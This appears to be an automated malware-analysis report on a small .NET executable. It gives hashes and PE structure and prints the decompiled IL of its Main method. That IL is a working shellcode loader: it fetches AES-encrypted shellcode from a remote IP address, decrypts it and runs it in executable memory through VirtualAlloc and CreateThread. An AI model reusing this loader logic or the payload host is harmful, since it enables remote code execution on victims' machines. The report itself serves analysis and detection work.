Suspicious
Suspect

052e802974bb858a01fc9e9496c6a545

PE Executable | MD5: 052e802974bb858a01fc9e9496c6a545 | Size: 68.1 KB | application/x-dosexec

Characteristics

Hashes
MD5: 052e802974bb858a01fc9e9496c6a545
Sha1: ba6f5efd50ae6ff13976914e9c265b451c866a14
Sha256: 31b17fc404bab396ffaf4885cc7bcad47da641e5d6f420cbc6db68122c407d83
Sha384: bcf7fa2525e0d642874e73c033d1b26594d97194e8754eb1428ffbd6f1323ceaf8cacea33aa17ae135ddfa28b830525c
Sha512: 3c8cb20112b8dfb507b52c98ecd13b0344690b6bd719203cd3dd3004a46ee2dc37fa64610c77a69c8b63d728e6468d64222074d7417706167ed1daef6eb21aeb
SSDeep: 768:kISI/cziFIo+++zwxw5s1liP1zumTUJZJ624JYNQFjIONiyktbiwXjJn5nwXJtgY:d+jL0iNDTyZ42Qp3NPkViwXFn5wXP
TLSH: E2635A197FBF07ECEEF64531DC132831092B8D5A99B9821354937E1836B0E0B9A27E75

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
  DosHeader
  PE Header
  Optional Header (x86)
  Section Headers
    .text
    .rsrc
    .reloc
  Resources
    RT_ICON
      ID:0001
        ID:2052
      ID:0002
        ID:2052
      ID:0003
        ID:2052
      ID:0004
        ID:2052
      ID:0005
        ID:2052
    RT_DIALOG
      ID:0081
        ID:2052
      ID:00C9
        ID:2052
      ID:00CD
        ID:2052
    RT_STRING
      ID:0007
        ID:2052
      ID:0008
        ID:2052
      ID:0009
        ID:2052
      ID:000A
        ID:2052
    RT_ACCELERATOR
      ID:0080
        ID:2052
    RT_RCDATA
      ID:0360
        ID:1033
    RT_GROUP_CURSOR4
      ID:0080
        ID:2052
    RT_VERSION
      ID:0001
        ID:2052
    RT_MANIFEST
      ID:0001
        ID:1033
Information
Module Name: 2.exe
Full Name: 2.exe
EntryPoint: System.Void AES_Shellcode_Tool.AES_Loader::Main()
Scope Name: 2.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: 2
Assembly Version: 0.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 10
Main Method: System.Void AES_Shellcode_Tool.AES_Loader::Main()
Main IL Instruction Count: 273
Main IL:

nop <null> ldstr http://202.95.1.68/ma/encrypted_shellcode.txt stloc.0 <null> ldstr [*] 从远程下载加密 shellcode... call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> ldloc.0 <null> call System.Net.WebRequest System.Net.WebRequest::Create(System.String) castclass System.Net.HttpWebRequest stloc.s V_12 ldloc.s V_12 ldstr GET callvirt System.Void System.Net.WebRequest::set_Method(System.String) nop <null> ldloc.s V_12 ldstr CustomAgent callvirt System.Void System.Net.HttpWebRequest::set_UserAgent(System.String) nop <null> ldloc.s V_12 callvirt System.Net.WebResponse System.Net.WebRequest::GetResponse() castclass System.Net.HttpWebResponse stloc.s V_13 ldloc.s V_13 callvirt System.IO.Stream System.Net.WebResponse::GetResponseStream() newobj System.Void System.IO.StreamReader::.ctor(System.IO.Stream) stloc.s V_14 nop <null> ldloc.s V_14 callvirt System.String System.IO.TextReader::ReadToEnd() ldc.i4.2 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 13 stelem.i2 <null> dup <null> ldc.i4.1 <null> ldc.i4.s 10 stelem.i2 <null> ldc.i4.1 <null> callvirt System.String[] System.String::Split(System.Char[],System.StringSplitOptions) stloc.1 <null> nop <null> leave.s IL_0085: leave.s IL_0094 ldloc.s V_14 brfalse.s IL_0084: endfinally ldloc.s V_14 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> leave.s IL_0094: nop ldloc.s V_13 brfalse.s IL_0093: endfinally ldloc.s V_13 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> leave.s IL_00B6: ldnull stloc.s V_15 nop <null> ldstr [-] 下载失败: ldloc.s V_15 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> leave IL_0274: ret ldnull <null> stloc.2 <null> ldnull <null> stloc.3 <null> ldnull <null> stloc.s V_4 ldc.i4.0 <null> stloc.s V_16 br.s IL_0129: ldloc.s V_16 nop <null> ldloc.1 <null> 
ldloc.s V_16 ldelem.ref <null> ldstr [AES_KEY_B64] call System.Boolean System.String::op_Equality(System.String,System.String) stloc.s V_17 ldloc.s V_17 brfalse.s IL_00E3: ldloc.1 ldloc.1 <null> ldloc.s V_16 ldc.i4.1 <null> add <null> dup <null> stloc.s V_16 ldelem.ref <null> stloc.2 <null> br.s IL_0122: nop ldloc.1 <null> ldloc.s V_16 ldelem.ref <null> ldstr [AES_IV_B64] call System.Boolean System.String::op_Equality(System.String,System.String) stloc.s V_18 ldloc.s V_18 brfalse.s IL_0103: ldloc.1 ldloc.1 <null> ldloc.s V_16 ldc.i4.1 <null> add <null> dup <null> stloc.s V_16 ldelem.ref <null> stloc.3 <null> br.s IL_0122: nop ldloc.1 <null> ldloc.s V_16 ldelem.ref <null> ldstr [ENCRYPTED_SHELLCODE_B64] call System.Boolean System.String::op_Equality(System.String,System.String) stloc.s V_19 ldloc.s V_19 brfalse.s IL_0122: nop ldloc.1 <null> ldloc.s V_16 ldc.i4.1 <null> add <null> dup <null> stloc.s V_16 ldelem.ref <null> stloc.s V_4 nop <null> ldloc.s V_16 ldc.i4.1 <null> add <null> stloc.s V_16 ldloc.s V_16 ldloc.1 <null> ldlen <null> conv.i4 <null> clt <null> stloc.s V_20 ldloc.s V_20 brtrue.s IL_00C2: nop ldloc.2 <null> brfalse.s IL_0143: ldc.i4.1 ldloc.3 <null> brfalse.s IL_0143: ldc.i4.1 ldloc.s V_4 ldnull <null> ceq <null> br.s IL_0144: stloc.s V_21 ldc.i4.1 <null> stloc.s V_21 ldloc.s V_21 brfalse.s IL_015B: ldloc.2 nop <null> ldstr [-] 数据解析失败 call System.Void System.Console::WriteLine(System.String) nop <null> br IL_0274: ret ldloc.2 <null> call System.Byte[] System.Convert::FromBase64String(System.String) stloc.s V_5 ldloc.3 <null> call System.Byte[] System.Convert::FromBase64String(System.String) stloc.s V_6 ldloc.s V_4 call System.Byte[] System.Convert::FromBase64String(System.String) stloc.s V_7 call System.Security.Cryptography.Aes System.Security.Cryptography.Aes::Create() stloc.s V_22 nop <null> ldloc.s V_22 ldloc.s V_5 callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Key(System.Byte[]) nop <null> ldloc.s V_22 ldloc.s V_6 
callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_IV(System.Byte[]) nop <null> ldloc.s V_22 ldc.i4.1 <null> callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Mode(System.Security.Cryptography.CipherMode) nop <null> ldloc.s V_22 ldc.i4.2 <null> callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Padding(System.Security.Cryptography.PaddingMode) nop <null> ldloc.s V_7 newobj System.Void System.IO.MemoryStream::.ctor(System.Byte[]) stloc.s V_23 ldloc.s V_23 ldloc.s V_22 callvirt System.Security.Cryptography.ICryptoTransform System.Security.Cryptography.SymmetricAlgorithm::CreateDecryptor() ldc.i4.0 <null> newobj System.Void System.Security.Cryptography.CryptoStream::.ctor(System.IO.Stream,System.Security.Cryptography.ICryptoTransform,System.Security.Cryptography.CryptoStreamMode) stloc.s V_24 newobj System.Void System.IO.MemoryStream::.ctor() stloc.s V_25 nop <null> ldloc.s V_24 ldloc.s V_25 callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream) nop <null> ldloc.s V_25 callvirt System.Byte[] System.IO.MemoryStream::ToArray() stloc.s V_8 nop <null> leave.s IL_01E7: leave.s IL_01F6 ldloc.s V_25 brfalse.s IL_01E6: endfinally ldloc.s V_25 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> leave.s IL_01F6: leave.s IL_0205 ldloc.s V_24 brfalse.s IL_01F5: endfinally ldloc.s V_24 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> leave.s IL_0205: nop ldloc.s V_23 brfalse.s IL_0204: endfinally ldloc.s V_23 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> nop <null> leave.s IL_0215: ldstr "[+] 解密完成, shellcode 长度: {0}" ldloc.s V_22 brfalse.s IL_0214: endfinally ldloc.s V_22 callvirt System.Void System.IDisposable::Dispose() nop <null> endfinally <null> ldstr [+] 解密完成, shellcode 长度: {0} ldloc.s V_8 ldlen <null> conv.i4 <null> box System.Int32 call System.String System.String::Format(System.String,System.Object) 
call System.Void System.Console::WriteLine(System.String) nop <null> ldsfld System.IntPtr System.IntPtr::Zero ldloc.s V_8 ldlen <null> conv.i4 <null> ldc.i4 12288 ldc.i4.s 64 call System.IntPtr AES_Shellcode_Tool.AES_Loader::VirtualAlloc(System.IntPtr,System.UInt32,System.UInt32,System.UInt32) stloc.s V_9 ldloc.s V_8 ldc.i4.0 <null> ldloc.s V_9 ldloc.s V_8 ldlen <null> conv.i4 <null> call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32) nop <null> ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloc.s V_9 ldsfld System.IntPtr System.IntPtr::Zero ldc.i4.0 <null> ldloca.s V_10 call System.IntPtr AES_Shellcode_Tool.AES_Loader::CreateThread(System.IntPtr,System.UInt32,System.IntPtr,System.IntPtr,System.UInt32,System.UInt32&) stloc.s V_11 ldloc.s V_11 ldc.i4.m1 <null> call System.UInt32 AES_Shellcode_Tool.AES_Loader::WaitForSingleObject(System.IntPtr,System.UInt32) pop <null> ret <null>

Artefacts
Embedded Resources: 0
Suspicious Type Names (1-2 chars): 0

Characteristics
No malware configuration was found at this point.